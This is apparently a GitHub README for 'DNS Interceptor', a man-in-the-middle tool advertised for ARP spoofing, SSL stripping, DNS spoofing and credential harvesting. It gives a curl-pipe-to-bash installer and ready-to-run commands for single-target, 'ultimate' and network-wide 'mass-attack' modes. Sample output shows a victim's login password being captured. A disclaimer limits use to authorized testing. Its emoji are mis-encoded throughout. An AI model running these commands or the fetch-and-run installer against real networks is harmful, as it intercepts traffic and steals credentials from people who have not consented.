π₯ Professional Network Security Analysis Tool - Advanced MITM Framework for Cybersecurity Professionals
- π― ARP Spoofing & Network Discovery
- ποΈ Advanced Packet Interception
- π SSL/TLS Traffic Analysis
- π Credential Harvesting
- π DNS Monitoring & Spoofing
- πΎ PCAP Export for Wireshark/Zeek
- π Memory Cache System
- π Professional HTML Reporting
curl -fsSL https://github.com/reza-ygb/dns-interceptor/releases/download/v2.0.1/install.sh | bash# Clone repository
git clone https://github.com/reza-ygb/dns-interceptor.git
cd dns-interceptor
# Install dependencies
pip3 install -r requirements.txt
# Make executable
chmod +x dns_interceptor.pysudo python3 dns_interceptor.py -i eth0 --discovery-onlysudo python3 dns_interceptor.py -i eth0 --intercept-only --save-pcap capture.pcapsudo python3 dns_interceptor.py -i eth0 -t 192.168.1.100 -g 192.168.1.1 --attacksudo python3 dns_interceptor.py -i eth0 -t 192.168.1.100 -g 192.168.1.1 --ultimate-modesudo python3 dns_interceptor.py -i eth0 --credential-harvest --export-cachesudo python3 dns_interceptor.py -i eth0 --mass-attackRequired:
-i, --interface Network interface (eth0, wlan0, etc.)
Target Specification:
-t, --target-ip Target IP address
-g, --gateway-ip Gateway/Router IP address
Operation Modes:
--discovery-only π Safe network discovery
--intercept-only ποΈ Passive packet analysis
--attack β οΈ Single target ARP attack
--ultimate-mode π ARP attack + packet interception
--credential-harvest π Aggressive credential hunting
--mass-attack π₯ Network-wide attack (DANGEROUS)
Output Options:
--save-pcap FILE πΎ Save packets to PCAP file
--export-cache π Export session data (JSON/CSV/TXT)
--generate-report π Generate HTML report
- Python 3.8+
- Root privileges (for raw socket access)
- Linux/macOS (recommended)
pip3 install scapy- Compatible with Wireshark, Zeek, TCPdump
- Full packet capture for forensic analysis
- JSON: Structured data for APIs
- CSV: Spreadsheet-compatible format
- TXT: Human-readable summaries
- Real-time packet analysis
- DNS query tracking
- Credential detection
- Host discovery
- Session statistics
This tool is for authorized security testing and educational purposes only.
- β Authorized penetration testing
- β Security research on own networks
- β Educational cybersecurity training
- β Unauthorized network attacks
- β Malicious activities
Users are responsible for compliance with applicable laws and regulations.
- Always obtain written authorization before testing
- Use only on networks you own or have permission to test
- Follow responsible disclosure for vulnerabilities
- Respect privacy and data protection laws
π₯ DNS Interceptor v2.0.0 - Professional Network Security Tool π₯
β‘ Advanced MITM Framework for Cybersecurity Professionals
π― ARP Spoofing | Packet Analysis | Credential Harvesting
π SSL Strip | DNS Spoofing | PCAP Export | Memory Cache
π [INTERFACE] Using: eth0
π₯οΈ [LOCAL-IP] Your IP: 192.168.1.50
ποΈ [INTERCEPT] Advanced packet analysis with caching...
π [HUNTING] Credentials, tokens, cookies, files...
πΎ [PCAP] Saving packets to: capture.pcap
π [LIVE] Advanced packet interception active...
π [22:41:30] DNS: 192.168.1.100 β google.com
π [22:41:31] SSL HANDSHAKE: 192.168.1.100 β 142.250.191.14
π [22:41:32] *** CREDENTIAL CAPTURED! ***
π― Source: 192.168.1.100:54321
π― Target: 10.0.0.5:80
π Pattern: PASSWORD=
π Data: POST /login HTTP/1.1...
π [STATS] Packets: 1250 | Passwords: 3 | DNS: 95 | Tokens: 12
- Fork the repository
- Create feature branch (
git checkout -b feature/amazing-feature) - Commit changes (
git commit -m 'Add amazing feature') - Push to branch (
git push origin feature/amazing-feature) - Open Pull Request
This project is licensed under the MIT License - see the LICENSE file for details.
- Ettercap - Comprehensive MITM framework
- Bettercap - Modern network attack framework
- MITMproxy - Interactive HTTPS proxy
- π§ Email: yaghobpoor@khu.ac.ir
β Star this repository if you find it useful for your cybersecurity work!